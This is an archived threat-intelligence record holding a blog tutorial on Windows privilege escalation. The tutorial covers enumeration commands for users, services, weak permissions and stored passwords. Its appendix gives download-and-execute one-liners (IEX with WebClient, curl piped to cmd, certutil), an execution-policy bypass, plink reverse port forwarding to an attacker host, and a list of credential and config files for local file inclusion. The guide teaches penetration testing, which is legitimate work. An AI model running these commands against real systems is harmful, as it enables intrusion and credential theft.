{
	"id": "74299a94-fe2f-4b8f-868d-801cf4f5363c",
	"created_at": "2026-04-06T01:28:49.926596Z",
	"updated_at": "2026-04-10T03:31:16.979816Z",
	"deleted_at": null,
	"sha1_hash": "a9c802e7496e65c94637d748caad63b015fb9b17",
	"title": "Windows Privilege Escalation Guide",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 143635,
	"plain_text": "Windows Privilege Escalation Guide\r\nBy Ryan McFarland\r\nArchived: 2026-04-06 01:18:39 UTC\r\nPrivilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need\r\nto know what to check and look for. This takes familiarity with systems that normally comes along with\r\nexperience. At first privilege escalation can seem like a daunting task, but after a while you start to filter through\r\nwhat is normal and what isn’t. It eventually becomes easier to know what to look for rather than digging through\r\neverything hoping to find that needle in the haystack. Hopefully this guide will provide a good foundation to build\r\nupon and get you started.\r\nThis guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have\r\nalready seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on\r\nthe enumeration aspect.\r\nNote: I am not an expert and still learning myself.\r\nGuide Layout\r\nIn each section I first provide the old trusted CMD commands and then also a Powershell equivalent for posterity\r\nsake. It’s good to have both tools under your belt and Powershell is much more versatile for scripting than the\r\ntraditional CMD. However there isn’t a Powershell equivalent for everything (or CMD is still simply easier/better\r\non certain things), so some sections will only contain regular CMD commands.\r\nVersion 1.3 - Last updated October 2018\r\nOperating System\r\nWhat is the OS and architecture? Is it missing any patches?\r\nsysteminfo\r\nwmic qfe\r\nIs there anything interesting in environment variables? A domain controller in LOGONSERVER ?\r\nset\r\nGet-ChildItem Env: | ft Key,Value\r\nAre there any other connected drives?\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 1 of 12\n\nnet use\r\nwmic logicaldisk get caption,description,providername\r\nGet-PSDrive | where {$_.Provider -like \"Microsoft.PowerShell.Core\\FileSystem\"}| ft Name,Root\r\nUsers\r\nWho are you?\r\nwhoami\r\necho %USERNAME%\r\n$env:UserName\r\nAny interesting user privileges? Note: The State column does not mean that the user does or does not have access\r\nto this privilege. If the privilege is listed, then that user has it.\r\nwhoami /priv\r\nWhat users are on the system? Any old user profiles that weren’t cleaned up?\r\nnet users\r\ndir /b /ad \"C:\\Users\\\"\r\ndir /b /ad \"C:\\Documents and Settings\\\" # Windows XP and below\r\nGet-LocalUser | ft Name,Enabled,LastLogon\r\nGet-ChildItem C:\\Users -Force | select Name\r\nIs anyone else logged in?\r\nqwinsta\r\nWhat groups are on the system?\r\nnet localgroup\r\nGet-LocalGroup | ft Name\r\nAre any of the users in the Administrators group?\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 2 of 12\n\nnet localgroup Administrators\r\nGet-LocalGroupMember Administrators | ft Name, PrincipalSource\r\nAnything in the Registry for User Autologon?\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" 2\u003enul | findstr \"DefaultUserName Default\r\nGet-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\WinLogon' | s\r\nAnything interesting in Credential Manager?\r\ncmdkey /list\r\ndir C:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials\\\r\ndir C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials\\\r\nGet-ChildItem -Hidden C:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials\\\r\nGet-ChildItem -Hidden C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials\\\r\nCan we access SAM and SYSTEM files?\r\n%SYSTEMROOT%\\repair\\SAM\r\n%SYSTEMROOT%\\System32\\config\\RegBack\\SAM\r\n%SYSTEMROOT%\\System32\\config\\SAM\r\n%SYSTEMROOT%\\repair\\system\r\n%SYSTEMROOT%\\System32\\config\\SYSTEM\r\n%SYSTEMROOT%\\System32\\config\\RegBack\\system\r\nPrograms, Processes, and Services\r\nWhat software is installed?\r\ndir /a \"C:\\Program Files\"\r\ndir /a \"C:\\Program Files (x86)\"\r\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\r\nGet-ChildItem 'C:\\Program Files', 'C:\\Program Files (x86)' | ft Parent,Name,LastWriteTime\r\nGet-ChildItem -path Registry::HKEY_LOCAL_MACHINE\\SOFTWARE | ft Name\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 3 of 12\n\nAre there any weak folder or file permissions?\r\nFull Permissions for Everyone or Users on Program Folders?\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(F)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(F)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(F)\" | findstr \"BUILTIN\\Users\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(F)\" | findstr \"BUILTIN\\Users\"\r\nModify Permissions for Everyone or Users on Program Folders?\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(M)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(M)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(M)\" | findstr \"BUILTIN\\Users\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(M)\" | findstr \"BUILTIN\\Users\"\r\nGet-ChildItem 'C:\\Program Files\\*','C:\\Program Files (x86)\\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Whe\r\nGet-ChildItem 'C:\\Program Files\\*','C:\\Program Files (x86)\\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Wher\r\nYou can also upload accesschk from Sysinternals to check for writeable folders and files.\r\naccesschk.exe -qwsu \"Everyone\" *\r\naccesschk.exe -qwsu \"Authenticated Users\" *\r\naccesschk.exe -qwsu \"Users\" *\r\nWhat are the running processes/services on the system? Is there an inside service not exposed? If so, can we open\r\nit? See Port Forwarding in Appendix.\r\ntasklist /svc\r\ntasklist /v\r\nnet start\r\nsc query\r\nGet-Process has a -IncludeUserName option to see the process owner, however you have to have\r\nadministrative rights to use it.\r\nGet-Process | where {$_.ProcessName -notlike \"svchost*\"} | ft ProcessName, Id\r\nGet-Service\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 4 of 12\n\nThis one liner returns the process owner without admin rights, if something is blank under owner it’s probably\r\nrunning as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.\r\nGet-WmiObject -Query \"Select * from Win32_Process\" | where {$_.Name -notlike \"svchost*\"} | Select Name, Handle,\r\nAny weak service permissions? Can we reconfigure anything? Again, upload accesschk.\r\naccesschk.exe -uwcqv \"Everyone\" *\r\naccesschk.exe -uwcqv \"Authenticated Users\" *\r\naccesschk.exe -uwcqv \"Users\" *\r\nAre there any unquoted service paths?\r\nwmic service get name,displayname,pathname,startmode 2\u003enul |findstr /i \"Auto\" 2\u003enul |findstr /i /v \"C:\\Windows\\\r\ngwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \"Auto\" -an\r\nWhat scheduled tasks are there? Anything custom implemented?\r\nschtasks /query /fo LIST 2\u003enul | findstr TaskName\r\ndir C:\\windows\\tasks\r\nGet-ScheduledTask | where {$_.TaskPath -notlike \"\\Microsoft*\"} | ft TaskName,TaskPath,State\r\nWhat is ran at startup?\r\nwmic startup get caption,command\r\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\ndir \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\"\r\ndir \"C:\\Documents and Settings\\%username%\\Start Menu\\Programs\\Startup\"\r\nGet-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl\r\nGet-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\r\nGet-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce'\r\nGet-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\r\nGet-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce'\r\nGet-ChildItem \"C:\\Users\\All Users\\Start Menu\\Programs\\Startup\"\r\nGet-ChildItem \"C:\\Users\\$env:USERNAME\\Start Menu\\Programs\\Startup\"\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 5 of 12\n\nIs AlwaysInstallElevated enabled? I have not ran across this but it doesn’t hurt to check.\r\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\r\nNetworking\r\nWhat NICs are connected? Are there multiple networks?\r\nipconfig /all\r\nGet-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address\r\nGet-DnsClientServerAddress -AddressFamily IPv4 | ft\r\nWhat routes do we have?\r\nroute print\r\nGet-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex\r\nAnything in the ARP cache?\r\narp -a\r\nGet-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State\r\nAre there connections to other hosts?\r\nnetstat -ano\r\nAnything in the hosts file?\r\nC:\\WINDOWS\\System32\\drivers\\etc\\hosts\r\nIs the firewall turned on? If so what’s configured?\r\nnetsh firewall show state\r\nnetsh firewall show config\r\nnetsh advfirewall firewall show rule name=all\r\nnetsh advfirewall export \"firewall.txt\"\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 6 of 12\n\nAny other interesting interface configurations?\r\nnetsh dump\r\nAre there any SNMP configurations?\r\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP /s\r\nGet-ChildItem -path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\SNMP -Recurse\r\nInteresting Files and Sensitive Information\r\nThis section may be a little noisy so you may want to output commands into txt files to review and parse as you\r\nwish.\r\nAny passwords in the registry?\r\nreg query HKCU /f password /t REG_SZ /s\r\nreg query HKLM /f password /t REG_SZ /s\r\nAre there sysprep or unattend files available that weren’t cleaned up?\r\ndir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2\u003enul\r\nGet-Childitem –Path C:\\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_\r\nIf the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files?\r\ndir /a C:\\inetpub\\\r\ndir /s web.config\r\nC:\\Windows\\System32\\inetsrv\\config\\applicationHost.config\r\nGet-Childitem –Path C:\\inetpub\\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue\r\nWhat’s in the IIS Logs?\r\nC:\\inetpub\\logs\\LogFiles\\W3SVC1\\u_ex[YYMMDD].log\r\nC:\\inetpub\\logs\\LogFiles\\W3SVC2\\u_ex[YYMMDD].log\r\nC:\\inetpub\\logs\\LogFiles\\FTPSVC1\\u_ex[YYMMDD].log\r\nC:\\inetpub\\logs\\LogFiles\\FTPSVC2\\u_ex[YYMMDD].log\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 7 of 12\n\nIs XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files?\r\ndir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf\r\nGet-Childitem –Path C:\\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction\r\nAny Apache web logs?\r\ndir /s access.log error.log\r\nGet-Childitem –Path C:\\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue\r\nAny interesting files to look at? Possibly inside User directories (Desktop, Documents, etc)?\r\ndir /s *pass* == *vnc* == *.config* 2\u003enul\r\nGet-Childitem –Path C:\\Users\\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue\r\nFiles containing password inside them?\r\nfindstr /si password *.xml *.ini *.txt *.config 2\u003enul\r\nGet-ChildItem C:\\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -\r\nAppendix\r\nEnumeration Script\r\nI’ve created a Powershell script which pretty much automates all of the above. You can check it out here.\r\nTransferring Files\r\nAt some point during privilege escalation you will need to get files onto your target. Below are some easy ways to\r\ndo so.\r\nPowerShell Cmdlet (Powershell 3.0 and higher)\r\nInvoke-WebRequest \"https://server/filename\" -OutFile \"C:\\Windows\\Temp\\filename\"\r\nPowerShell One-Liner\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 8 of 12\n\n(New-Object System.Net.WebClient).DownloadFile(\"https://server/filename\", \"C:\\Windows\\Temp\\filename\")\r\nPowerShell One-Line Script Execution in Memory\r\nIEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')\r\nPowerShell with Proxy\r\n$browser = New-Object System.Net.WebClient;\r\n$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;\r\nIEX($browser.DownloadString('https://server/script.ps1'));\r\nPowerShell Script\r\necho $webclient = New-Object System.Net.WebClient \u003e\u003ewget.ps1\r\necho $url = \"http://server/file.exe\" \u003e\u003ewget.ps1\r\necho $file = \"output-file.exe\" \u003e\u003ewget.ps1\r\necho $webclient.DownloadFile($url,$file) \u003e\u003ewget.ps1\r\npowershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1\r\nNon-interactive FTP via text file. Useful for when you only have limited command execution.\r\necho open 10.10.10.11 21\u003e ftp.txt\r\necho USER username\u003e\u003e ftp.txt\r\necho mypassword\u003e\u003e ftp.txt\r\necho bin\u003e\u003e ftp.txt\r\necho GET filename\u003e\u003e ftp.txt\r\necho bye\u003e\u003e ftp.txt\r\nftp -v -n -s:ftp.txt\r\nCertUtil\r\ncertutil.exe -urlcache -split -f https://myserver/filename outputfilename\r\nCertutil can also be used for base64 encoding/decoding.\r\ncertutil.exe -encode inputFileName encodedOutputFileName\r\ncertutil.exe -decode encodedInputFileName decodedOutputFileName\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 9 of 12\n\nStarting with Windows 10 1803 (April 2018 Update) the curl command has been implemented which gives\r\nanother way to transfer files and even execute them in memory. Piping directly into cmd will run most things but it\r\nseems like if you have anything other than regular commands in your script, ie loops, if statements etc, it doesn’t\r\nrun them correctly.\r\ncurl http://server/file -o file\r\ncurl http://server/file.bat | cmd\r\nAnd with PowerShell\r\nIEX(curl http://server/script.ps1);Invoke-Blah\r\nPort Forwarding\r\nThis is useful for exposing inside services that aren’t available from outside the machine, normally due to firewall\r\nsettings.\r\nUpload plink.exe to target.\r\nStart SSH on your attacking machine.\r\nFor example to expose SMB, on the target run:\r\nplink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS\r\nAs of Windows 10 1803 (April 2018 Update), ssh client is now included and turned on by default! So you’re able\r\nuse ssh to do port forwarding right out of the box now.\r\nssh -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS\r\nLocal File Inclusion List\r\nThis is not an exhaustive list, installation directories will vary, I’ve only listed common ones.\r\nC:\\Apache\\conf\\httpd.conf\r\nC:\\Apache\\logs\\access.log\r\nC:\\Apache\\logs\\error.log\r\nC:\\Apache2\\conf\\httpd.conf\r\nC:\\Apache2\\logs\\access.log\r\nC:\\Apache2\\logs\\error.log\r\nC:\\Apache22\\conf\\httpd.conf\r\nC:\\Apache22\\logs\\access.log\r\nC:\\Apache22\\logs\\error.log\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 10 of 12\n\nC:\\Apache24\\conf\\httpd.conf\r\nC:\\Apache24\\logs\\access.log\r\nC:\\Apache24\\logs\\error.log\r\nC:\\Documents and Settings\\Administrator\\NTUser.dat\r\nC:\\php\\php.ini\r\nC:\\php4\\php.ini\r\nC:\\php5\\php.ini\r\nC:\\php7\\php.ini\r\nC:\\Program Files (x86)\\Apache Group\\Apache\\conf\\httpd.conf\r\nC:\\Program Files (x86)\\Apache Group\\Apache\\logs\\access.log\r\nC:\\Program Files (x86)\\Apache Group\\Apache\\logs\\error.log\r\nC:\\Program Files (x86)\\Apache Group\\Apache2\\conf\\httpd.conf\r\nC:\\Program Files (x86)\\Apache Group\\Apache2\\logs\\access.log\r\nC:\\Program Files (x86)\\Apache Group\\Apache2\\logs\\error.log\r\nc:\\Program Files (x86)\\php\\php.ini\"\r\nC:\\Program Files\\Apache Group\\Apache\\conf\\httpd.conf\r\nC:\\Program Files\\Apache Group\\Apache\\conf\\logs\\access.log\r\nC:\\Program Files\\Apache Group\\Apache\\conf\\logs\\error.log\r\nC:\\Program Files\\Apache Group\\Apache2\\conf\\httpd.conf\r\nC:\\Program Files\\Apache Group\\Apache2\\conf\\logs\\access.log\r\nC:\\Program Files\\Apache Group\\Apache2\\conf\\logs\\error.log\r\nC:\\Program Files\\FileZilla Server\\FileZilla Server.xml\r\nC:\\Program Files\\MySQL\\my.cnf\r\nC:\\Program Files\\MySQL\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.0\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.1\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.1\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.5\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.5\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.6\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.6\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.7\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.7\\my.ini\r\nC:\\Program Files\\php\\php.ini\r\nC:\\Users\\Administrator\\NTUser.dat\r\nC:\\Windows\\debug\\NetSetup.LOG\r\nC:\\Windows\\Panther\\Unattend\\Unattended.xml\r\nC:\\Windows\\Panther\\Unattended.xml\r\nC:\\Windows\\php.ini\r\nC:\\Windows\\repair\\SAM\r\nC:\\Windows\\repair\\system\r\nC:\\Windows\\System32\\config\\AppEvent.evt\r\nC:\\Windows\\System32\\config\\RegBack\\SAM\r\nC:\\Windows\\System32\\config\\RegBack\\system\r\nC:\\Windows\\System32\\config\\SAM\r\nC:\\Windows\\System32\\config\\SecEvent.evt\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 11 of 12\n\nC:\\Windows\\System32\\config\\SysEvent.evt\r\nC:\\Windows\\System32\\config\\SYSTEM\r\nC:\\Windows\\System32\\drivers\\etc\\hosts\r\nC:\\Windows\\System32\\winevt\\Logs\\Application.evtx\r\nC:\\Windows\\System32\\winevt\\Logs\\Security.evtx\r\nC:\\Windows\\System32\\winevt\\Logs\\System.evtx\r\nC:\\Windows\\win.ini\r\nC:\\xampp\\apache\\conf\\extra\\httpd-xampp.conf\r\nC:\\xampp\\apache\\conf\\httpd.conf\r\nC:\\xampp\\apache\\logs\\access.log\r\nC:\\xampp\\apache\\logs\\error.log\r\nC:\\xampp\\FileZillaFTP\\FileZilla Server.xml\r\nC:\\xampp\\MercuryMail\\MERCURY.INI\r\nC:\\xampp\\mysql\\bin\\my.ini\r\nC:\\xampp\\php\\php.ini\r\nC:\\xampp\\security\\webdav.htpasswd\r\nC:\\xampp\\sendmail\\sendmail.ini\r\nC:\\xampp\\tomcat\\conf\\server.xml\r\nSource: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/"
	],
	"report_names": [
		"2018-01-26-Windows-Privilege-Escalation-Guide"
	],
	"threat_actors": [
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775438929,
	"ts_updated_at": 1775791876,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a9c802e7496e65c94637d748caad63b015fb9b17.pdf",
		"text": "https://archive.orkl.eu/a9c802e7496e65c94637d748caad63b015fb9b17.txt",
		"img": "https://archive.orkl.eu/a9c802e7496e65c94637d748caad63b015fb9b17.jpg"
	}
}